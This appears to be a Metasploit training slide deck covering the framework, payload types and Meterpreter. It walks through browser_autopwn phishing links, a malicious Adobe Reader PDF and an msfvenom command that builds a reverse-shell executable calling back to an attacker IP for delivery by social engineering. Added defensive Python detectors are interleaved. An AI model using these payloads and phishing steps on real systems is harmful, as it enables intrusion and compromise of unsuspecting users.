
Metasploit (Module-1) - Getting Started With Metasploit


Page 1: Metasploit (Module-1) - Getting Started With Metasploit

Metasploit

Module 1

By- Anurag Srivastava


Agenda

• Introduction to Metasploit
• History of Metasploit
• Exploits
• Payloads
• Auxiliary
• Network Reconnaissance with Metasploit
• Metasploit Payloads
• Meterpreter and Post Exploitation
• Client-side Exploitation: browser, PDF and EXE
• References


Introduction to Metasploit

• Vulnerability and exploitation framework designed to ease the burden on security professionals when it comes to performing security assessments.

• One of the single most useful auditing tools freely available to security professionals today

• Contains an extensive library of "modules".

• Each module has a function, and they are divided up into "exploits", "auxiliary", "post" (post exploitation), "payloads", "encoders", and "nops".


History

• Created by H. D. Moore in 2003 as a portable network tool using Perl

• In April, 2004 - With the help of Spoonm, HD released a total rewrite of the project, Metasploit 2.0 (19 exploits and 27 payloads).

• By 2007, the Metasploit Framework had been completely rewritten in Ruby

• On October 21, 2009, it was acquired by Rapid7


Exploits

• Vectors for penetrating the target systems.

• A software program that has been developed to attack an asset by taking advantage of a vulnerability.

• The objective of many exploits is to gain control over an asset.


Payloads

• A payload in Metasploit is the module that is paired with an exploit.

• Each exploit can be paired with various payloads, such as reverse or bind shells, the Meterpreter shell, etc.

• A payload is a piece of code to be executed through said exploit.


Auxiliary

• Metasploit Framework includes hundreds of auxiliary modules that perform scanning, fuzzing, sniffing, and much more.

• Although these modules will not give you a shell, they are extremely valuable when conducting a penetration test.


Network Reconnaissance with Metasploit

• The foundation of any successful penetration test is solid reconnaissance.

• Gathering enough information regarding the target.

• One example of reconnaissance is using the nmap tool for port scanning and identifying the services running on the target system.
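The port scan described above is just as visible from the target's side: one source touching many distinct ports on one host in a short time. The following detector is an added example (not from the slides) that runs a sliding-window count of distinct destination ports over a constructed connection log; the log format, the 60-second window and the threshold of 8 ports are assumptions chosen for the demonstration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample connection log (not taken from the slides): one source
# (10.0.0.5) touches ten different ports on a single host within a few seconds,
# which is what a port scan looks like from the target's side; 10.0.0.9 is a
# normal client that only talks to two services.
SAMPLE_LOG = """\
2024-01-01T10:00:00 src=10.0.0.5 dst=10.0.0.20 dport=21 action=REJECT
2024-01-01T10:00:00 src=10.0.0.5 dst=10.0.0.20 dport=22 action=ACCEPT
2024-01-01T10:00:01 src=10.0.0.5 dst=10.0.0.20 dport=23 action=REJECT
2024-01-01T10:00:01 src=10.0.0.5 dst=10.0.0.20 dport=25 action=REJECT
2024-01-01T10:00:02 src=10.0.0.5 dst=10.0.0.20 dport=80 action=ACCEPT
2024-01-01T10:00:02 src=10.0.0.5 dst=10.0.0.20 dport=110 action=REJECT
2024-01-01T10:00:03 src=10.0.0.5 dst=10.0.0.20 dport=139 action=REJECT
2024-01-01T10:00:03 src=10.0.0.5 dst=10.0.0.20 dport=443 action=ACCEPT
2024-01-01T10:00:04 src=10.0.0.5 dst=10.0.0.20 dport=445 action=REJECT
2024-01-01T10:00:04 src=10.0.0.5 dst=10.0.0.20 dport=3389 action=REJECT
2024-01-01T10:00:05 src=10.0.0.9 dst=10.0.0.20 dport=443 action=ACCEPT
2024-01-01T10:05:00 src=10.0.0.9 dst=10.0.0.20 dport=80 action=ACCEPT
this line is malformed and is skipped by the parser
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>\S+) dst=(?P<dst>\S+) "
    r"dport=(?P<dport>\d+) action=(?P<action>\S+)$"
)


def parse_log(text):
    """Parse the constructed log format into a time-sorted list of event dicts."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        events.append({
            "ts": datetime.fromisoformat(m["ts"]),
            "src": m["src"],
            "dst": m["dst"],
            "dport": int(m["dport"]),
            "action": m["action"],
        })
    events.sort(key=lambda e: e["ts"])
    return events


def detect_port_scans(events, window=timedelta(seconds=60), min_ports=8):
    """Sliding-window detector: flag a (src, dst) pair once it has touched at
    least `min_ports` distinct destination ports inside any `window`-long span.
    Returns {(src, dst): {"ports": n, "rejects": r}} for flagged pairs, where
    n is the largest distinct-port count seen and r the rejected attempts in
    that window."""
    recent = defaultdict(deque)   # (src, dst) -> (ts, dport, action) inside window
    alerts = {}
    for e in events:
        key = (e["src"], e["dst"])
        q = recent[key]
        q.append((e["ts"], e["dport"], e["action"]))
        while q and e["ts"] - q[0][0] > window:
            q.popleft()
        ports = {p for _, p, _ in q}
        if len(ports) >= min_ports:
            rejects = sum(1 for _, _, a in q if a == "REJECT")
            prev = alerts.get(key, {"ports": 0, "rejects": 0})
            if len(ports) >= prev["ports"]:
                alerts[key] = {"ports": len(ports), "rejects": rejects}
    return alerts


if __name__ == "__main__":
    for (src, dst), info in detect_port_scans(parse_log(SAMPLE_LOG)).items():
        print(f"possible scan: {src} -> {dst}: {info['ports']} ports, "
              f"{info['rejects']} rejected")
```

The high ratio of rejected attempts is the second signal worth keeping: a legitimate client rarely knocks on closed ports, while a scanner hits mostly closed ones.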


Metasploit Payloads

• There are mainly three different types of payload modules in the Metasploit Framework: Singles, Stagers, and Stages.

• Singles: self-contained and completely standalone; can be something as simple as adding a user to the target system or running calc.exe.

• Stagers: set up a network connection between the attacker and victim, and are designed to be small and reliable.

• Stages: payload components that are downloaded by stager modules. Stages provide advanced features with no size limits, such as Meterpreter, VNC injection, and the iPhone 'ipwn' shell.


Meterpreter and Post Exploitation

• Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime.

• Meterpreter communicates over the stager socket and provides a comprehensive client-side Ruby API.

• Post-exploitation is done after exploitation in order to maintain control of the compromised system for future use.

• Post-exploitation includes setting up a backdoor to maintain more permanent system access and covering one's tracks.


Client-side Exploitation

• Client-side attacks require user interaction, such as enticing the user to click a link, open a document, or otherwise reach your malicious website.

• These types of attacks are often delivered by using cleverly worded emails, sometimes with attachments such as Microsoft Word and PDF documents.

• These attacks are often used in conjunction with social engineering techniques, by way of phishing or spear-phishing attacks.


Browser Exploitation

• Browser exploitation involves running a browser exploit in order to take advantage of a flaw or vulnerability in an operating system or piece of software, with the intent to breach browser security and alter a user's browser settings without their knowledge.

• Malicious code may exploit ActiveX, HTML, images, Java, JavaScript, and other Web technologies and cause the browser to run arbitrary code.


In order to use this attack we have to open the Metasploit Framework and use the browser_autopwn module.


Set LHOST to your IP address, SRVPORT to port 80 (otherwise the link that we have to send to the user must be in the format IP:8080) and URIPATH to / in order to prevent Metasploit from setting up a random URL.


Now we can share the link via email with our client's employees. If any user opens the malicious link, the autopwn module will try all of its exploits in order to see if it can break into the client. If the browser is vulnerable to any of these exploits, a Meterpreter session will open.


PDF Exploitation

• Exploiting a system using an attacker-crafted PDF file.

• Mainly targets systems whose PDF reader is vulnerable to some sort of attack, such as a buffer overflow.

• The PDF is distributed to the victims by social engineering techniques.

• Sometimes the PDF application fails to perform adequate boundary checks on user-supplied data, and thus the system can be attacked using a PDF exploitation technique.


We are going to be using the Adobe Reader 'util.printf()' JavaScript Function Stack Buffer Overflow Vulnerability.


Once we have all the options set the way we want, we run “exploit” to create our malicious file.

We will use msfconsole to set up our multi/handler listener.


Clicking the file opens Adobe Reader but shows a greyed-out window that never reveals a PDF. Instead, on the attacker's machine a Meterpreter session is opened, and thus we have a shell on the victim system.
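A document like the one described in this PDF section carries its trigger inside the file: an OpenAction that runs a JavaScript stream, usually compressed so that a naive grep for util.printf on the raw bytes finds nothing. The triage script below is an added example (not from the slides) in the style of keyword-counting PDF scanners: it builds a constructed sample PDF with a Flate-compressed script (not an exploit document, and without an xref table), resolves #xx hex escapes in object names, inflates every stream, and counts the names and calls a responder would want to see before opening the file. The keyword lists and verdict rules are assumptions for the demonstration.

```python
import re
import zlib

# Object names and JavaScript API calls worth counting when triaging a PDF.
# util.printf is the function named on the slide; the rest are the usual
# markers of script-bearing or auto-launching documents.
SUSPICIOUS_NAMES = [b"/JavaScript", b"/JS", b"/OpenAction", b"/AA", b"/Launch",
                    b"/EmbeddedFile"]
SUSPICIOUS_CALLS = [b"util.printf", b"unescape", b"eval"]


def build_sample_pdf(js=b'app.alert("hi"); util.printf("%d", 1);', obfuscate=False):
    """Construct a minimal PDF whose OpenAction runs a Flate-compressed JavaScript
    stream. It is a constructed triage sample, not an exploit document, and it
    omits the xref table (viewers would have to repair it; the scanner does not
    care). With obfuscate=True the /JavaScript name is written with a #xx hex
    escape, as malicious files often do to dodge naive string matching."""
    compressed = zlib.compress(js)
    action = b"<< /S /JavaScript /JS 5 0 R >>"
    if obfuscate:
        action = action.replace(b"/JavaScript", b"/Java#53cript")
    objects = [
        b"<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R >>",
        action,
        b"<< /Length %d /Filter /FlateDecode >>\nstream\n" % len(compressed)
        + compressed + b"\nendstream",
    ]
    out = b"%PDF-1.4\n"
    for num, body in enumerate(objects, start=1):
        out += b"%d 0 obj\n" % num + body + b"\nendobj\n"
    return out + b"trailer\n<< /Root 1 0 R >>\n%%EOF\n"


def _unescape_names(data):
    """Resolve #xx hex escapes (e.g. /Java#53cript -> /JavaScript) so that name
    matching sees the canonical spelling."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), data)


def _stream_bodies(data):
    """Yield the body of every stream...endstream pair, inflated when it is
    zlib/Flate data and raw otherwise, so script hidden behind /FlateDecode is
    still visible to the call scan. decompressobj tolerates a truncated tail."""
    for m in re.finditer(rb"stream\r?\n(.*?)\nendstream", data, re.S):
        body = m.group(1)
        try:
            yield zlib.decompressobj().decompress(body)
        except zlib.error:
            yield body


def triage_pdf(data):
    """Count suspicious names (in object dictionaries) and suspicious JavaScript
    calls (in raw and inflated streams) and return a small report."""
    names_view = _unescape_names(data)   # escapes resolved for name matching only
    names = {}
    for name in SUSPICIOUS_NAMES:
        # require a delimiter after the name so /JS does not also count /JSX
        hits = len(re.findall(re.escape(name) + rb"(?![A-Za-z0-9_])", names_view))
        if hits:
            names[name.decode()] = hits
    texts = [data] + list(_stream_bodies(data))
    calls = {}
    for call in SUSPICIOUS_CALLS:
        hits = sum(t.count(call) for t in texts)
        if hits:
            calls[call.decode()] = hits
    script_markers = {"/JavaScript", "/JS", "/Launch"}
    if calls or script_markers & names.keys():
        verdict = "suspicious"
    elif names:
        verdict = "review"     # auto-actions present but no script found
    else:
        verdict = "clean"
    return {"names": names, "calls": calls, "verdict": verdict}


if __name__ == "__main__":
    print(triage_pdf(build_sample_pdf()))
    print(triage_pdf(build_sample_pdf(obfuscate=True)))
```

The obfuscated variant yields the same name counts as the plain one, which is the point of resolving escapes before matching; the inflated stream is what exposes the util.printf call that the raw bytes hide.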


EXE Exploitation

• Generate an executable from a Metasploit payload in order to target a victim through a malicious executable file.

• If you can get a user to run your payload for you, there is no reason to go through the trouble of exploiting any software.

• Generate a reverse shell payload, execute it on a remote system, and get our shell.

• The best way to do this is to backdoor an executable by embedding it with malicious payloads.


msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.1.101 LPORT=3333 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exe

Use 'multi/handler', which is a stub that handles exploits launched outside of the framework. Run 'exploit' for the multi/handler and execute our generated executable on the victim.
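The payload in the msfvenom line above, windows/shell/reverse_tcp, is staged in the sense of the Stagers/Stages slide: the small stager connects back to the multi/handler and the handler then sends the full stage. The script below is an added example (not Metasploit code and not from the slides) of a network-side heuristic for that handshake. It assumes the classic reverse_tcp behaviour: the client says nothing, the server replies with a 4-byte little-endian length followed by exactly that many bytes of stage, typically high-entropy shellcode or a PE image. Stageless payloads and the HTTP/HTTPS transports do not produce this pattern, so it is one indicator among several, not a signature.

```python
import math
import random
import struct

# Heuristic for the classic reverse_tcp staging handshake (an assumption about
# the stager family named in the msfvenom line, not a signature taken from
# Metasploit itself): the stager connects out and says nothing; the handler
# replies with a 4-byte little-endian length followed by exactly that many
# bytes of stage, which is usually high-entropy shellcode or a PE image.


def shannon_entropy(data):
    """Bits per byte of the given buffer (8.0 is uniform random, text is ~4-5)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def analyze_server_stream(server_bytes, client_first_bytes=b"",
                          min_len=512, max_len=16 * 1024 * 1024):
    """Score a reassembled server-to-client TCP stream against the staging
    heuristic. `client_first_bytes` is whatever the client sent before the
    server's first segment (empty when the server spoke first)."""
    if len(server_bytes) < 4:
        return {"declared_length": None, "actual_length": len(server_bytes),
                "entropy": 0.0, "indicators": [], "suspicious": False}
    declared = struct.unpack("<I", server_bytes[:4])[0]
    stage = server_bytes[4:]
    indicators = []
    if declared == len(stage) and min_len <= declared <= max_len:
        indicators.append("4-byte length prefix matches the bytes that follow")
    if client_first_bytes == b"":
        indicators.append("server sent data before the client sent anything")
    if stage[:2] == b"MZ":
        indicators.append("stage begins with a PE (MZ) header")
    entropy = shannon_entropy(stage[:4096])
    if entropy > 6.5:
        indicators.append(f"high-entropy stage ({entropy:.2f} bits/byte)")
    return {"declared_length": declared, "actual_length": len(stage),
            "entropy": round(entropy, 2), "indicators": indicators,
            "suspicious": len(indicators) >= 3}


def constructed_staging_stream(stage_len=2048, seed=7):
    """Constructed stand-in for what a handler would send: a length prefix and a
    deterministic pseudo-random blob starting with 'MZ'. It is not a payload."""
    rng = random.Random(seed)
    stage = b"MZ" + bytes(rng.getrandbits(8) for _ in range(stage_len - 2))
    return struct.pack("<I", len(stage)) + stage


def constructed_http_stream():
    """Constructed benign exchange: the client spoke first and the reply is text."""
    client = b"GET / HTTP/1.1\r\nHost: example.test\r\n\r\n"
    body = b"<html><body>ok</body></html>"
    server = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
              b"Content-Length: %d\r\n\r\n" % len(body) + body)
    return server, client


if __name__ == "__main__":
    print(analyze_server_stream(constructed_staging_stream()))
    srv, cli = constructed_http_stream()
    print(analyze_server_stream(srv, client_first_bytes=cli))
```

The "server speaks first on an arbitrary high port" indicator is the cheapest one to compute from flow data alone and is worth alerting on by itself when the destination is outside the organisation.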


The generated executable can be distributed using some sort of social engineering attack; as soon as it is executed on the victim system it presents the attacker with a shell on the victim system.


References

• https://www.offensive-security.com/metasploit-unleashed/
• Mastering Metasploit by Nipun Jaswal
• http://hackeracademy.com/module/introduction-to-pdf-attacks
• https://pentestlab.wordpress.com
• https://community.rapid7.com/community/metasploit